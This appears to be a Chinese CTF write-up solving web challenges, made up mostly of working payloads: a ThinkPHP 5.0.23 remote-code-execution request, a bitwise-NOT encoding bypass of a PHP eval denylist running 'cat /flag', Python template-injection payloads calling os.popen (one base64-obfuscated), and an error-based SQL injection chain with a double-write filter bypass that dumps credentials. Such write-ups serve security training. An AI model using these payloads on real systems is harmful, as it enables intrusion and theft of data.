SWU解题记录,太菜了太菜了,哭哭

THINKPHP?

?s=captcha

V5.0.23

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=env

PHP? Eval?

<?php
// Challenge source as served: a denylist-filtered eval() sink. Code kept verbatim; the
// comments record why the filter is not a security boundary.
highlight_file(__FILE__);   // echoes this file to the client, so the filter logic is public
error_reporting(0);         // suppresses warnings, e.g. the bare-word `cmd` constant below
// Hand-written denylist of function names (note "ini_set" appears twice, and "echo" is a
// language construct rather than a function, so that entry only matches the literal text).
$blacklist = ["system", "ini_set", "exec", "scandir", "shell_exec", "proc_open", "error_log", "ini_alter", "ini_set", "pfsockopen", "readfile", "echo", "file_get_contents", "readlink", "symlink", "popen", "fopen", "file", "fpassthru"];
// Every built-in function name is appended, so almost any literal function call is denied.
$blacklist = array_merge($blacklist, get_defined_functions()['internal']);
// Case-insensitive substring match of each denied name against the raw GET parameter.
// `$_GET[cmd]` uses an unquoted bare word: PHP 7 treats it as the string 'cmd' with a warning
// (hidden by error_reporting(0)); PHP 8 throws an Error for the undefined constant.
// The check only inspects the literal request text: input that produces a function name at
// runtime (string operators, alternate encodings) contains none of the denied tokens and
// passes — the bypass recorded below this listing shows exactly that. A denylist cannot make
// eval() of request data safe; the only effective fix is to not evaluate untrusted input.
foreach($blacklist as $i){
    if(stristr($_GET[cmd], $i)!==false){
        die('hack');
    }
}
eval($_GET[cmd]);   // arbitrary code execution sink; reached by anything the substring filter misses
?>

URL编码取反绕过

php -r "var_dump(urlencode(~'system'));" => string(18) "%8C%86%8C%8B%9A%92"
php -r "var_dump(urlencode(~'cat /flag'));" => string(27) "%9C%9E%8B%DF%D0%99%93%9E%98"
?cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);

Py?py

{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag.txt').read()")}}

{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['ZXZhbA=='.decode('base64')]("X19pbXBvcnRfXygnb3MnKS5wb3BlbignY2F0IGZsYWcudHh0JykucmVhZCgp".decode('base64'))}}

SQL? no sqlmap

报错注入

'or(updatexml(1,concat(0x7e,version(),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2Cversion%28%29%2C0x7e%29%2C1%29%29%23

~10.3.18-MariaDB~

'or(updatexml(1,concat(0x7e,database(),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2Cdatabase%28%29%2C0x7e%29%2C1%29%29%23

~vaalacat~

'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28select%28group_concat%28table_name%29%29from%28information_schema.tables%29where%28table_schema%29like%28database%28%29%29%29%2C0x7e%29%2C1%29%29%23

过滤了 select

双写绕过

'or(updatexml(1,concat(0x7e,(selselectect(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28table_name%29%29from%28information_schema.tables%29where%28table_schema%29like%28database%28%29%29%29%2C0x7e%29%2C1%29%29%23

~vaala~

'or(updatexml(1,concat(0x7e,(selselectect(group_concat(column_name))from(information_schema.columns)where(table_name)like('vaala')),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28column_name%29%29from%28information_schema.columns%29where%28table_name%29like%28%27vaala%27%29%29%2C0x7e%29%2C1%29%29%23

~id,username,password~

'or(updatexml(1,concat(0x7e,(selselectect(group_concat(username,'~',password))from(vaala)),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28username%2C%27~%27%2Cpassword%29%29from%28vaala%29%29%2C0x7e%29%2C1%29%29%23

'~vaala~flag{ccb506e8-afa0-46b8-b'

'or(updatexml(1,concat(0x7e,(selselectect(group_concat((right(password,30))))from(vaala)),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28%28right%28password%2C30%29%29%29%29from%28vaala%29%29%2C0x7e%29%2C1%29%29%23

'~8-afa0-46b8-b177-e3a2fc5592b6}~'

flag{ccb506e8-afa0-46b8-b177-e3a2fc5592b6}